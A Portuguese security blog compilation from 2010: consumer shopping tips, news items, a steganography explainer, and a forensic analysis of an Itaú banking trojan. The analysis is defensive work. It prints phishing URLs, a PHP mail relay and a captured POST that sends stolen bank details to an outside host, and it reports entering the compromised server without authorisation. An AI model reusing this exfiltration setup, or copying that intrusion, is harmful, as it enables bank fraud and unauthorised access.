quinta-feira, 23 de dezembro de 2010

Comércio eletrônico, crimes cibernéticos e procedimentos preventivos

SUMÁRIO

I – INTRODUÇÃO
II – PESQUISA SOBRE A LOJA VIRTUAL
III – O DOMÍNIO DO SITE
IV – CADEADO DE SEGURANÇA
V – CARTÃO DE CRÉDITO
VI – E-MAIL DA LOJA
VIII – SITES DE LEILÃO
IX – PROGRAMAS DE PROTEÇÃO DO COMPUTADOR
X – COMPUTADOR PARA EFETUAR A COMPRA
XI – CONCLUSÃO



I – INTRODUÇÃO
Seja pela facilidade de comparar preços, pelo comodismo de não sair de casa ou por outros motivos, a cada dia mais pessoas descobrem as vantagens de adquirir produtos em lojas virtuais.
Apesar destas facilidades relacionadas com o comércio eletrônico temos vislumbrado um crescimento no número de pessoas que são vítimas de crimes cibernéticos.
Estas vítimas de crimes cometidos por intermédio de computadores geralmente relatam falta de conhecimento sobre a segurança da informação, em especial das medidas preventivas visando preservar a segurança nas aquisições de produtos pela internet.
Para evitar ser mais uma destas vítimas os usuários de computadores quando desejam adquirir algum produto devem adotar alguns procedimentos preventivos, conforme sugestões abaixo relacionadas.
II – PESQUISA SOBRE A LOJA VIRTUAL
A necessidade de pesquisar sobre a idoneidade de um site de comércio eletrônico reside no fato de que muitos criminosos criam falsos sites para vender produtos que, na verdade, nunca serão entregues. Também existem lojas de comércio eletrônico que oferecem produtos usados, de baixa qualidade ou falsificados.
Pesquise sobre o site aonde vai realizar a compra. No site Registro.br (www.registro.br) é possível obter mais informações sobre o site, inclusive quem é o seu proprietário e outros dados importantes. Se o site possuir um domínio registrado em outro país, como nos casos em que o endereço do site termina em “.com”, “.fr”, “.net”, “.es”, “.jp”, “.pt”, etc, utilize o site http://lacnic.net para pesquisar.
Obtenha o número do CNPJ (Cadastro Nacional das Pessoas Jurídicas) da empresa de comércio eletrônico e pesquise a situação cadastral no site da Receita Federal (www.receita.fazenda.gov.br).
Também utilize sites de busca para pesquisar sobre opiniões, avaliações e reclamações de empresa de comércio eletrônico e se possuem selos de empresa reconhecida ou confiável.
Nada como a opinião de alguém que já adquiriu produtos da empresa para avaliar se é confiável comprar os produtos que ela oferece.
Existem inúmeros sites que publicam reclamações de desrespeito ou até mesmo crimes contra consumidores, como por exemplo, www.nuncamais.net, www.reclameaqui.com.br, etc.
Alguns sites de comércio eletrônico oferecem como forma de contato apenas um número de telefone celular ou informam que se localizam em determinado Estado, mas o código DDD do telefone pertence a outro, geralmente não são confiáveis.
A loja virtual possuir um endereço físico e trabalhar no mesmo ramo há alguns anos são fatores que permitem maior credibilidade.
Exija sempre nota fiscal como prova da seriedade da loja virtual e autenticidade do produto.
III – O DOMÍNIO DO SITE
O domínio é o endereço do site. Quando adquirir produtos pela internet procure utilizar apenas sites brasileiros, ou seja, cujo domínio termine em “.com.br”.
Desconfie de vendedores que oferecem produtos com preços muito abaixo do valor de mercado.
IV – CADEADO DE SEGURANÇA
Preste atenção ao protocolo de segurança da comunicação entre o seu computador e o servidor, o nome do protocolo é SSL (Secure Socket Layer) ou TLS (Transport Layer Security) e significa que os dados transmitidos são criptografados.
Sites que utilizam este protocolo de segurança possuem o endereço no formato “https://www”, diferente do usual “http://www”.
Quando acessar um site de comércio eletrônico observe na parte inferior do navegador se aparece um cadeado ativado, pois geralmente a existência dele significa que o site é confiável e possui certificado de segurança. Se o usuário clicar no cadeado é possível conferir o certificado digital do site.
O certificado é criado por uma Autoridade Certificadora (AC), como por exemplo, o Verisign, o Multicert, o Saphety, o Certisign, etc.
A existência do cadeado não é garantia absoluta que o site seja confiável, pois existe a possibilidade dele ser forjado. Ocorreram casos semelhantes em computadores cujo aplicativo Java estava desatualizado.
V – CARTÃO DE CRÉDITO
Adquira na instituição bancária dois cartões de crédito diferentes, um deles para compras tradicionais e outro, com limite baixo, para aquisição de produtos pela internet.
De qualquer modo evite compras com cartão de crédito pela internet, é mais seguro pagar com boleto bancário ou sedex a cobrar. O mercado pago ou o pague seguro também são alternativas mais adequadas.
Monitore de forma pormenorizada os créditos e débitos do seu cartão de crédito e dê atenção diferenciada para as compras realizadas pela internet. Muitas vezes a vítima não confere os dados do extrato do cartão e acaba não tendo conhecimento de eventuais prejuízos.
VI – E-MAIL DA LOJA
Tome cuidado com e-mails recebidos de lojas de comércio eletrônico, pois podem ser falsos. Nunca coloque seus dados pessoais em formulários gerados a partir de links apresentados nestes e-mails.
Não faça download, nem execute arquivos anexos aos e-mails, pois podem instalar em seu computador arquivos maliciosos.
Deixe habilitado o bloqueador de spams, para que rejeite de forma automática as mensagens de origem duvidosa que forem encaminhadas.
VII – CUIDADOS COM A SENHA
A senha deve ter pelo menos oito caracteres, sendo letras maiúsculas, minúsculas e números, aleatoriamente escolhidos.
Não escolha senhas que sejam fáceis de descobrir, como por exemplo, data de nascimento, aniversário de familiares, nomes de pessoas próximas, time favorito, dados do endereço, animal de estimação, etc.
Existe uma modalidade de ação de criminosos cibernéticos chamada engenharia social que consiste em fazer com que a vítima forneça informações pessoais, sem que perceba que elas oferecem subsídios para o criminoso descobrir a senha ou outras informações sensíveis.
Nunca utilize a mesma senha para atividades diferentes. Tenha senhas diferentes para transações bancárias, e-mails e cadastro em sites de comércio eletrônico.
Mantenha em sigilo suas senhas e não as salve no computador. Altere as senhas constantemente.
Não se esqueça de clicar em sair (logout) depois que realizar a sua compra, principalmente se utilizar um computador compartilhado por outras pessoas.
VIII – SITES DE LEILÃO
São freqüentes golpes envolvendo sites que promovem leilões virtuais. Estes sites procuram se isentar da responsabilidade nos casos de prejuízos causados por criminosos que utilizem estes serviços.
Deve-se analisar a reputação do vendedor, há quanto tempo ele comercializa produtos e, acima de tudo, as especificações do produto que será adquirido para evitar a compra de produtos diferentes do que desejava. Procure esclarecer todas suas dúvidas com o vendedor.
No caso de descumprimento do combinado entre comprador e vendedor utilize as ferramentas que o site disponibiliza para qualificá-lo, de forma que os demais usuários tenham acesso às características negativas dele.
Ao comprar produtos pela internet saiba que geralmente os gastos com frete são suportados pelo comprador.
Nas compras em lojas virtuais de outros países observe os valores das taxas de importação e do frete para evitar gastos não previstos.
IX – PROGRAMAS DE PROTEÇÃO DO COMPUTADOR
Tenha instalado em seu computador programas para evitar infecções, invasões ou danos. Neste sentido é importante a utilização de:
a) antivírus: programa que detecta e remove arquivos maliciosos, ou seja, aqueles capazes de produzir danos aos demais arquivos do computador. Entre os usuários do sistema operacional Windows, os antivírus mais utilizados são: Avira, Kaspersky, Norton, McAfee, AVG, Avast, etc. Nos demais sistemas operacionais, como por exemplo, o Linux, a incidência de vírus e outros programas maliciosos é muito inferior.
b) antispyware: programa para detectar e remover trojans (cavalo de tróia) que monitorem as atividades do usuário de computador. Os antispyware mais conhecidos são: Lavasoft Ad-Aware, Spybot Search & Destroy, Microsoft AntiSpyware.
c) firewall: programa que evita invasão em um computador, cria um filtro entre as comunicações de uma rede com outra (parede corta fogo). São muito usados o ZoneAlarm e o Ashampoo Firewall.
É importante que esses programas sejam atualizados automaticamente. O mesmo se aplica ao sistema operacional (SO) e navegador, tendo em vista que as atualizações são feitas para aperfeiçoar e corrigir suas vulnerabilidades.
X – COMPUTADOR PARA EFETUAR A COMPRA
Apenas efetue compras por intermédio do computador da sua residência ou do computador do trabalho que você utilize com exclusividade, nunca na residência de outras pessoas, no notebook de terceiros ou, pior ainda, em lan houses.
XI – CONCLUSÃO
É inquestionável que adquirir produtos pela internet torna o usuário de computadores mais suscetível de se tornar vítima de crimes cibernéticos, contudo quanto maior o conhecimento sobre a segurança na internet e a intenção de adotar estes procedimentos preventivos, menor é a possibilidade de sofrer dissabores.
Se a adoção destas medidas não for suficiente e o usuário de computador se tornar vítima de um crime, a recomendação é que procure uma Delegacia de Polícia para que a Polícia Civil promova a adequada investigação criminal.
Nestes casos, forneça para os policiais civis o maior número possível de informações impressas, principalmente cópias dos e-mails que trocou com o vendedor, além dos dados pessoais dele e da loja e da descrição do produto conforme consta no site.

HIGOR VINICIUS NOGUEIRA JORGE é Delegado de Polícia, professor de análise de inteligência da Academia da Polícia Civil e professor universitário. Tem feito palestras sobre segurança da informação, crimes cibernéticos, TI e drogas. Site: www.higorjorge.com.br Twitter: http://twitter.com/higorjorge

Falha de segurança afeta todas as versões do Internet Explorer


Microsoft, no entanto, afirma que o impacto da vulnerabilidade é limitado e não exige uma atualização de emergência.

Por Computerworld/US

23 de dezembro de 2010 - 18h28
página 1 de 1


A Microsoft confirmou na última quarta-feira (22/12) que todas as versões do Internet Explorer contêm uma falha crítica que pode comprometer a maquina do usuário caso ele acesse uma página infectada. Embora a empresa tenha se comprometido a corrigir o problema, a empresa não pretende liberar uma atualização de emergência.
“A vulnerabilidade não atende aos critérios que nos forçaria a lançar um update fora do cronograma (out-of-band release)”, disse a porta-voz do setor de segurança da companhia, Carlene Chmaj, a partir do blog oficial. “Ainda assim, estamos monitorando de perto a situação e, se algo mudar, nossa postura será outra”.
“Atualmente, o impacto da vulnerabilidade é limitado e não temos conhecimento de nenhum cliente que tenha sido infectado ou de algum ataque que a esteja explorando”.
A falha, no motor HTML, foi descoberta há algumas semanas pela consultoria francesa Vupen. Na última terça-feira (23/12) os pesquisadores divulgaram um vídeo, demonstrando como ela poderia ser usada por crackers de modo semelhante ao que a companhia de segurança digital McAfee já havia alertado. O código malicioso desabilitaria dois recursos de proteção – o ASLR e o DEP – e iniciaria o ataque.
Até que uma correção seja providenciada, a Microsoft pede aos que usam o IE para habilitar a ferramenta EMET – usualmente utilizada por usuários avançados -  melhorando as defesas do browser. A empresa publicou, junto ao seu aviso de segurança, as instruções para completar a tarefa.
É a segunda vez que a gigante recomenda a ferramenta – cujo download está disponível em seu site. Em setembro, ela a sugeriu como modo de bloquear os ataques que exploravam vulnerabilidade o Adobe Reader.
Os usuários que utilizam IE7 ou IE8 no Windows Vista ou 7 estão menos propensos a terem suas máquinas infectadas. Segundo a Microsoft, estes navegadores incluem um recurso chamado de “Modo Protegido” que alertam os internautas antes que eles instalem, rodem ou modifiquem certas operações do sistema.
Os outros browsers mais populares – Firefox, Chrome, Safari e Opera – não possuem a falha identificada no Internet Explorer.

http://computerworld.uol.com.br/seguranca/2010/12/23/falha-de-seguranca-afeta-todas-as-versoes-do-internet-explorer/

Assange diz que publicará 3,7 mil documentos sobre Israel em '4 ou 6 meses'

WikiLeaks
x
x
x
Escoge un idioma y obten la traducción de esta página


Pesquisa na
Base de Dados
Defesa @ Net


Gadgets powered by Google
 

23 dezembro 2010


Cairo, 23 dez (EFE).- O fundador do WikiLeaks, Julian Assange, afirmou em entrevista divulgada pela rede de televisão "Al Jazeera" que seu portal publicará 3,7 mil documentos sobre Israel dentro de quatro ou seis meses.
"Ainda estamos esperando para publicar documentos sobre Israel, a grande maioria deles não foram divulgados e são polêmicos", disse.
Segundo o criador da portal que filtrou mais de 250 mil comunicações diplomáticas americanas, o WikiLeaks tem 3,7 mil "documentos relacionados com Israel ou cuja origem é Israel", e que apenas "1 ou 2%" deles foram revelados.
Nestas mensagens, entre as quais há "documentos delicados" e "secretos", segundo Assange, constam questões relacionadas com a guerra entre Israel e o Hisbolá em 2006 ou sobre a morte do dirigente do grupo palestino Hamas, Mahmoud al Mabhuh, em janeiro deste ano, supostamente provocada pelos serviços de inteligência israelenses.
"Dependemos até agora dos cinco grandes jornais do mundo, e o que já foi publicado reflete os interesses destes diários, como 'The Guardian', 'El País' e 'Le Monde', mas não representam necessariamente o que consideramos importante, mas vamos revelar todos os documentos que temos, e isto demorará quatro ou seis meses", explicou.
Assange negou ter mantido qualquer contato com o governo de Israel.
"Não tivemos nenhum contato direto ou indireto com Israel, mas acreditamos que os serviços de inteligência israelenses acompanham de perto o que fazemos", disse.
x Link sugerido:
  Index WikiLeaks - Matérias Publicadas

As sutilezas da Esteganografia

Por Luiz Sales Rabelo*

Bom dia, amigo leitor! Como tema do meu primeiro artigo para este blog, decidi falar um pouco so bre a arte da esteganografia.
A palavra esteganografia é derivada de duas outras palavras de origem grega: “Steganos”, que significa segredo, e “Graphos”, que significa escrita. Basicamente, esteganografia é uma técnica utilizada para esconder informações “incorporando” mensagens importante dentro de outra mensagem, aparentemente inofensiva. O meio mais comum de esteganografia é utilizando arquivos de imagens. Os formatos de compressão mais utilizados são:

· GIF- Graphic Interface Format;
· BMP- A Microsoft standard image;
· JPEG- Joint Photographic Experts;
· TIFF- Tag Image File Format.

Algumas pessoas podem confundir a esteganografia com a criptografia, mas, salvo que ambas têm como objetivo proteger uma informação, essas técnicas não estão relacionadas entre si. É possível criptografar uma mensagem e então utilizar a esteganografia para ocultar essa massa de dados criptografada em um arquivo de imagem, como também é possível armazenar uma informação em texto simples, não criptografada, em um arquivo de imagem.

Para não estender muito este artigo (esteganografia é um assunto que cabe muita discussão), vou me limitar a falar sobre uma das técnicas mais utilizadas: Least Significant Bit Insertion. Esta técnica consiste em fazer uso do bit menos significativo dos pixels de uma imagem e alterá-lo. A mesma técnica pode ser aplicada a um arquivo de áudio ou vídeo, embora não seja tão comum. Feito assim, a distorção da imagem em geral é reduzida ao mínimo, sendo praticamente invisível. Em geral, esta técnica funciona melhor quando a imagem é de grande resolução, tem grandes variações de cor e também leva a maior profundidade de cor.

Exemplo: O valor (1 1 1 1 1 1 1 1) é um número binário de 8 bits. O bit localizado à direita é chamado de "bit menos significativo”, porque é o de menor peso, alterar este bit significa alterar o mínimo possível do valor total do número representado.

Um exemplo de esteganografia: Escondendo a letra "A". Imagine a parte de uma imagem no formato de pixel RGB (3 bytes), sua representação original pode ser: (3 pixels, 9 bytes):

(1 1 0 1 1 0 1 0) (0 1 0 0 1 0 0 1) (0 1 0 0 0 0 1 1)
(0 0 0 1 1 1 1 0) (0 1 0 1 1 0 1 1) (1 1 0 1 1 1 1 1)
(0 0 0 0 1 1 1 0) (0 1 0 0 0 1 1 1) (0 0 0 0 0 1 1 1)

A mensagem criptografada é 'A', que é a representação em binário (1 0 0 1 0 1 1 1), em seguida, os novos pixels seriam alterados:

(1 1 0 1 1 0 1 1) (0 1 0 0 1 0 0 0) (0 1 0 0 0 0 1 0)
(0 0 0 1 1 1 1 1) (0 1 0 1 1 0 1 0) (1 1 0 1 1 1 1 1)
(0 0 0 0 1 1 1 1) (0 1 0 0 0 1 1 1) (0 0 0 0 0 1 1 1)

Note-se que o algorítimo substituiu o bit da mensagem (em negrito) em cada um dos bits menos significativo dos 3 pixels de cor. Foram necessários 8 bytes para a mudança, um para cada bit da letra A, o nono byte de cor não foi usado, mas é parte do terceiro pixel (seu terceiro componente de cor).

Além disso, este método não altera o tamanho do arquivo, pois emprega uma técnica de substituição de informações. Esta técnica tem a desvantagem de que o tamanho do arquivo de suporte deve ser proporcionalmente maior quanto a mensagem a ser oculta, ou seja, você precisa de 8 bytes para cada byte de imagem para esconder a mensagem, o que limita a capacidade máxima para armazenar uma imagem de uma mensagem escondida em 12,5%. Se você pretende usar uma parcela maior de bits da imagem (por exemplo, não só por último, mas os dois últimos bits de cada byte), pode começar a ser perceptível ao olho humano as distorções causadas na imagem final pela técnica de esteganografia.

Essencialmente, a esteganografia explora as limitações da percepção humana, pois os nossos sentidos não são capazes de detectar estas mínimas anomalias geradas pela técnica. Para detecção destas informações ocultas, empregamos uma técnica chamada de estegoanálise. Vou falar sobre as técnicas de estegoanálise no próximo post.

Até lá!

Pesquisador de segurança cria ferramenta para ataques DDoS com um encurtador de URL

23 de dezembro de 2010
« Voltar para as notícias do dia
O pesquisador de segurança Ben Schmidt criou uma ferramenta (PoC, prova de conceito) que permite realizar ataques distribuídos de negação de serviço com o navegador, e mascará-los através de um encurtador de URL. A ferramenta chama-se d0z.me – The Evil URL Shortner e tem como objetivo chamar a atenção para a utilização crescente de encurtadores de URL em redes sociais, especialmente no Twitter.
A ferramenta funciona da seguinte maneira: um atacante cria um link no d0z.me que contém um link de destino e um link para ser atacado. O link de destino é uma página qualquer que chame a atenção dos usuários nas redes sociais e preferencialmente que mantenha-os nela por algum tempo. Quando os usuários visitarem o link, um iframe ocupando toda a página mostrará a página de destino. Enquanto isso, um JavaScript chamado JS LOIC (JavaScript Low Orbit Ion Cannon, uma ferramenta de ataque DDoS) atacará o site até que o usuário feche a janela. Veja mais detalhes no blog do autor da ferramenta, Spare Clock Cycles.

http://www.seginfo.com.br/pesquisador-de-seguranca-cria-ferramenta-para-ataques-ddos-com-um-encurtador-de-url/

Empresa lista deslizes de segurança com nome de celebridades

Da Redação

tecnologia@eband.com.br

Uma pesquisa divulgada nesta terça-feira aponta os piores deslizes de segurança on-line usando nomes de celebridades mais pesquisados na internet em 2010. A pesquisa da empresa de segurança PC Tools diz que o cantor Justin Bieber foi o mais pesquisado este ano.

De acordo com o levantamento, uma mensagem de um falso concurso para acompanhar o ídolo teen durante tour na Coreia do Norte foi o que mais prejudicou os internautas.

Na segunda posição ficou Lady Gaga e Kesha, que tiveram suas músicas entre as 10 mais buscadas na rede. Foram usadas ofertas de downloas ilegais de músicas inéditas, fotos, vídeo clipes em troca de roubo de informações pessoais.

O filme “Eclipse”, da saga “Crepúsculo”, número um no ranking dos filmes mais procurados, foi utilizado para infectar os computadores dos fãs seduzidos por um falso trailer da saga.

O filme “Harry Potter e as Relíquias da Morte Parte 1”, número dois no ranking dos filmes mais procurados, foi usado para roubar a identidade das vítimas em troca do filme.


Redação: Eduardo Djun
http://www.band.com.br/jornalismo/tecnologia/conteudo.asp?ID=100000381785

Pen drive compartilha na nuvem

por Felipe Maia
coment�rios 1 Comentário

Os “gêmeos siameses” da foto não são apenas pen drives iguais ou que funcionam como um cabo para conectar um PC a outro. A dupla se chama iTwin e faz tudo isso de uma maneira mais interessante e segura.
Cada parte do iTwin fica ligada a uma porta USB de um computador. Com uma conexão de internet ativa nos dois, eles podem transmitir arquivos entre um e outro. Como não possuem memória flash, os dados transferidos vem do HD de cada dispositivo.
O esquema não seria muito novo não fosse a criptografia AES de 256 bits que o iTwin usa. Dessa maneira, a cada uso uma nova chave de acesso é criada, permitindo que a transferência de arquivos seja segura e exclusiva entre os dois pen drives.
O iTwin está à venda nos Estados Unidos por 99 dólares. Ele saiu em edição limitada neste Natal, apenas 50 exemplares estão disponíveis para compra.

http://info.abril.com.br/noticias/blogs/gadgets/miscelanea/pen-drive-compartilha-na-nuvem/

Perícia e Análise da Fraude Bancária iToken Itaú

 Elaborado por Ronaldo Lima

crimesciberneticos.com | twitter.com/crimescibernet

iToken é um dispositivo de senhas eletrônicas utilizado pelo Banco Itaú para adicionar mais uma barreira de proteção para seus clientes acessarem contas bancárias pela Internet. Nesse caso os fraudadores utilizam o nome do dispositivo na engenharia social para induzirem as vítimas a instalarem malwares em seus computadores.


Identificação e Coleta das Evidências

No dia 19/10/2010 recebi um spam phishing com os campos “De: Itaú Bankline” e “Assunto: Central de segurança Itaú: iToken v1.3”. No e-mail havia um link que apontava para a URL:

http://dmcbattle.co.za/seguranca/dispositivo.php?InstalarAplicativo=ver1.3


Ao clicar no link foi solicitado o download do arquivo abaixo:

Nome: Aplicativov1.3.exe (Trojan-Banker.Win32.Banker2.abp)
MD5: 124ecdd2bd55b9e2d28542ff3da65ef5

No dia 05/11/2010 recebi um outro phishing com os mesmos campos “De: Itaú Bankline” e “Assunto: Central de segurança Itaú: iToken v1.3”, porém o texto escrito nesse e-mail era diferente (apesar de ser sobre o mesmo tema) e o link apontava para outra URL:

http://acoffeeinthepark.com/logs/dispositivo.php?InstalarAplicativo=itokenv13-257823732654


Ao clicar no link foi solicitado o download de um arquivo com o mesmo nome, mas com MD5 diferente:

Nome: Aplicativov1.3.exe (Trojan-Banker.Win32.Banker2.aer)
MD5: a36d31cac126e6ff56eb786e57c689af

Análise das Evidências

Para descobrir mais informações sobre os arquivos coletados, submeti o primeiro “Aplicativov1.3.exe” ao programa Exeinfo PE para identificar um possível packer no executável.


Nada foi encontrado, porém o programa também não conseguiu identificar a linguagem de programação utilizada. O mesmo aconteceu com o PEiD e RDG.

Prosseguindo submeti o arquivo ao OllyDbg. Na busca por strings relevantes também não identifiquei nenhuma pista sobre a função do arquivo até encontrar essa linha:

“Software\WinRAR SFX”


O módulo SFX (SelF-eXtrating) do WinRAR permite descomprimir arquivos automaticamente sem a necessidade de outros programas, o próprio executável carrega o módulo de descompressão.

Resolvi executar o arquivo para confirmar se seria descompactado algum outro executável. Ao fazer isso foi criado um novo arquivo:

Nome: iToken.exe (Trojan-Banker.Win32.Banker2.abp)
MD5: 51e5d6f6f0ff2bc0ae3792d98d12fdbe

O arquivo “iToken.exe” foi criado e executado automaticamente. Antes de analisar o funcionamento dele eu queria realizar a engenharia reversa, então matei o processo e o submeti ao Exeinfo PE.


Nenhum packer foi encontrado e a linguagem de programação foi identificada: Borland Delphi.

A análise de executáveis codificados em Delphi na maioria das vezes fica mais fácil através do descompilador DeDe do que o Assembly no OllyDbg. Então utilizei o DeDe para descompilar o “iToken.exe” e gerar um projeto para abrir depois no próprio Delphi.

O DeDe conseguiu identificar três Forms e Units no executável.


Ao abrir o projeto gerado pelo DeDe no Delphi e visualizar os três Forms, encontrei as telas utilizadas pelo malware:

Tela 1


Tela 2


Tela 3


Conforme pode-se ver, as três telas são cópias das páginas verdadeiras do site do Banco Itaú. Nelas são solicitadas várias informações bancárias que tentam persuadir as vítimas digitarem seus dados sigilosos.

Na Tela 3 do malware há um botão (que na verdade é uma imagem) denominado “CONFIRMAR”. No projeto do Delphi nesse botão há um evento “ImageClick” codificado, ou seja, quando ele é clicado executa alguma função.

A função nesse caso é bastante peculiar, enviar para o e-mail do fraudador todas as informações que a vítima digitou. Diferente do que ocorre na maioria das vezes, dessa vez o e-mail está em texto simples, sem criptografia.


No código logo abaixo do endereço de e-mail, há algo que me chamou atenção, uma URL.

http://www.oberoning.lv/plugins/system/fckgwrhqq2.php


A princípio não entendi a função dela no malware, mas resolvi investigar, queria saber o que havia no código-fonte desse arquivo “fckgwrhqq2.php”.

Para conseguir isso teria que descobrir qual vulnerabilidade o fraudador explorou para invadir o site www.oberoning.lv (Letônia). Meu amigo Bernardo descobriu isso pra mim e tive acesso ao servidor.


Fiz download do arquivo “fckgwrhqq2.php” e o código-fonte dele era esse:

<?php
$email = $_POST['email'] ;
$from = $_POST['from'];
$subject = $_POST['subject'];
$message = $_POST['message'] ;

mail( $email, $subject, $message, "From: $from" );
?>

Então na verdade não era o malware que enviava o e-mail, ele apenas passava os dados pela URL para essa página PHP que recebia e enviava a mensagem. Ele deve ter feito dessa forma para simplificar o código-fonte do malware.

Para confirmar todas essas informações e não deixar nenhuma dúvida, deixei rodando um sniffer de rede (Wireshark) e executei o malware inserindo dados falsos.

Os pacotes capturados geraram esse tráfego de rede:

POST /plugins/system/fckgwrhqq2.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
Host: www.oberoning.lv
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

email=aXXXXXX%40gmail%2Ecom&from=iniciando%40exe%2Ecom&subject=VIRTUAL%5FXP&message=1111%0D11111%0D1%0D000000%0D01+01+01+01+01+01+%0D03+03+03+03+03+03+&


Lembrando que no começo do artigo escrevi que havia dois arquivos “Aplicativov1.3.exe” com MD5 diferentes, ao executar o segundo gerou também um “iToken.exe” com MD5 diferente.

Nome: iToken.exe (Trojan-Banker.Win32.Banker2.aer)
MD5: 9615a83c0cfca4793bbfb5206f3afa06

Esse segundo “iToken.exe” possuía exatamente as mesmas funções do primeiro analisado mas o endereço de e-mail e URL para onde ele enviava as informações furtadas era outra.


Conclusão

Nessa perícia foi possível constatar a materialidade da fraude, a dinâmica e apontar um caminho para identificar a autoria através dos endereços de e-mails encontrados. Todas as informações foram encaminhadas para a polícia civil.

Verificou-se a existência de dois malwares com funções idênticas mas com endereços de e-mails e spam distintos. Isso pode significar que o fraudador utiliza dados diferentes para aplicar o mesmo golpe ou ainda que esse malware foi vendido ou trocado por várias pessoas que apenas personalizam com seus e-mails.

O que costuma ocorrer bastante nesse tipo de crime, um programador cria o malware e vende para os fraudadores que não possuem muitos conhecimentos em computação e apenas adaptam de acordo com suas necessidades.

Quer ajudar no combate aos crimes cibernéticos? Caso também tenha recebido esse spam dizendo ser do Banco Itaú para atualização do iToken encaminhe para meu e-mail (crimesciberneticos@ymail.com) que farei a análise e enviarei para a polícia. Ou ainda caso você mesmo(a) queira fazer a análise, só me envie então os resultados.

[POST adicionado em 15/11/2010]

Conforme eu havia solicitado, o leitor Almir me enviou um spam que recebeu também referente a essa fraude do iToken Itaú. Nesse phishing, na engenharia social utilizaram a marca Itaú Personnalité para tentar enganar as vítimas.

Ao clicar no link do email foi solicitado o download do arquivo "iTokenv1.2.exe", esse arquivo seguia o mesmo padrão dos outros, ao executá-lo foi descompactado o arquivo "update.exe".

Aos descompilar o "update.exe" foram identificadas as mesmas telas da fraude, porém dessa vez as cores utilizadas no malware seguem o padrão do Itaú Personnalité. Novamente foi identificado um endereço de email para onde são enviados os dados furtados.

Agradeço a todos que colaboram com o Blog deixando comentários, enviando e-mails e divulgando. Caso ainda receba esse mesmo tipo de e-mail peço que me envie.

[POST adicionado em 23/12/2010]

A fraude do iToken Itaú ainda esta ativa, dessa vez foi o leitor Clenilson que me encaminhou o e-mail do golpe para análise. Esse ao clicar no link faz download do arquivo:

dispositivo.exe (MD5: 9d3b0096646d3ba27e5e5ed265e50912)

Após ser executado gera o arquivo:

dr.exe (MD5: 7caff8bdd3135362e0f36dea618a287d)

Apresenta uma janela para a vítima digitar os dados bancários e depois envia por e-mail para o fraudador conforme imagem abaixo:


Ronaldo Lima
crimesciberneticos.com | twitter.com/crimescibernet

segunda-feira, 6 de dezembro de 2010

WIKILEAKS, DIREITO À INFORMAÇÃO E DEFESA NACIONAL

por Higor Vinicius Nogueira  Jorge

"Nossos diplomatas não são ativos de inteligência”
P.J. Crowley – Porta voz do Departamento de Estado dos EUA




I – INTRODUÇÃO
Espionagem, sabotagem, infiltração, comprometimento, compartimentação de conhecimentos sensíveis, recrutamento, dissimulação, história cobertura, estratégia, manipulação, serviço secreto, cyberterrorismo, guerra de informações, diplomacia, segurança nacional, contra-inteligência, classificação de documentos sigilosos e outros tantos termos são utilizados geralmente por órgãos de inteligência para caracterizar a sua atividade fim, que é a produção de conhecimentos sensíveis para subsidiar a tomada de decisão pelos governantes do país.
Neste sentido, uma das características destes órgãos é a confidencialidade de sua atuação e dos seus documentos, ou seja, permanecem distantes dos cidadãos comuns porque não são divulgados.


II – WIKILEAKS
Há algum tempo estes termos passaram a ser utilizados com maior freqüência em razão da divulgação no site da organização WikiLeaks de milhões de informações e documentos considerados sigilosos.
Inicialmente o site teve o domínio wikileaks.org, mas atualmente tem sido alterado constantemente, conforme extraído do twitter dos seus organizadores (twitter.com/wikileaks).
O WikiLeaks é uma organização transnacional, sem fins lucrativos, sediada na Suécia que disponibiliza na internet dados, informações, documentos, vídeos e fotos confidenciais, oriundas de governos ou grandes corporações.
De acordo com o exposto no site a organização é composta por jornalistas credenciados, programadores de softwares, engenheiros de rede e matemáticos de diversos países, cuja identidade é preservada por intermédio da utilização do software Tor, que é utilizado na difusão dos dados e informações sigilosos.
O site é coordenado pelo jornalista e cyberativista Julian Assange que atualmente é procurado pelo governo da Suécia em razão de crimes que teria cometido no referido país.


III – WIKILEAKS E OS ESTADOS UNIDOS
Em abril de 2010, um vídeo chamado “Assassinato Colateral” (Collateral Murder) despertou a atenção mundial, pois mostrava militares norte americanos em um helicóptero promovendo a execução de civis desarmados em uma rua do Iraque, sem qualquer indicação que fossem terroristas.
No mês de julho, o site publicou um conjunto de documentos denominados “Diários da Guerra Afegã” (Afghan War Diary) que descrevem a ação de grupos militares norte americanos e aliados, que promoviam ações contra talibãs e chefes da Al Qaeda e que também produziam a morte de milhares de civis.
Em outubro foram divulgados os “Registros da Guerra do Iraque” (Iraq War Logs) com informações sobre torturas contra terroristas presos e ataques contra civis no Iraque.
No final do mês de novembro passaram a publicar diversos telegramas sigilosos entre as embaixadas e o governo dos Estados Unidos.
A empresa Bahnhof, que hospedava o site na Suécia, passou a sofrer ataques virtuais e o site passou a ser hospedado pelo amazon.com. No início de dezembro o amazon.com deixou de hospedar o site em seus servidores e o seu domínio tem variado constantemente.
O secretário-geral da Organização das Nações Unidas (ONU), Ban Ki-moon teria sido espionado. Consta que no mês de julho de 2009 foi solicitado que os diplomatas americanos informassem dados biométricos detalhados e informações técnicas (incluindo dados sobre cartões de crédito, DNA e senhas utilizadas nas comunicações) do secretário-geral e outras autoridades da ONU.
As informações divulgadas no site também indicam que líderes árabes como, por exemplo, o rei da Arábia Saudita, Abdullah Bin Abdul Aziz, pressionaram o governo americano para que bombardeasse o Irã.


IV – WIKILEAKS E O BRASIL
Em relação ao Brasil diversas comunicações foram obtidas. De acordo com os documentos disponibilizados no WikiLeaks o governo não aceitou receber prisioneiros suspeitos de terrorismo mantidos nas prisões de Guantánamo no ano de 2005.
Quanto a pane ocorrida no ano de 2009, no sistema de fornecimento de energia elétrica em grande parte do país, foi descartado que tenha ocorrido em razão de uma ação promovida por hackers.
Também há comunicações no sentido de que o governo norte-americano considera o Itamaraty adversário de seus pleitos e com tendências antiamericanas.
Os norte americanos também demonstraram preocupação com grupos islâmicos supostamente extremistas que estariam instalados na área da tríplice fronteira (Porto Iguazu – Argentina, Cidade do Leste – Paraguai e Foz do Iguaçu - Brasil) e com a atuação da Polícia Federal teria realizado diversas prisões de pessoas envolvidas com o terrorismo islâmico, mas não teria lhes acusado pelo envolvimento com o terrorismo, apenas por outros crimes, para não amedrontar futuros turistas interessados em conhecer o país, nem “estigmatizar a comunidade muçulmana”.


V – AS CONSEQUENCIAS
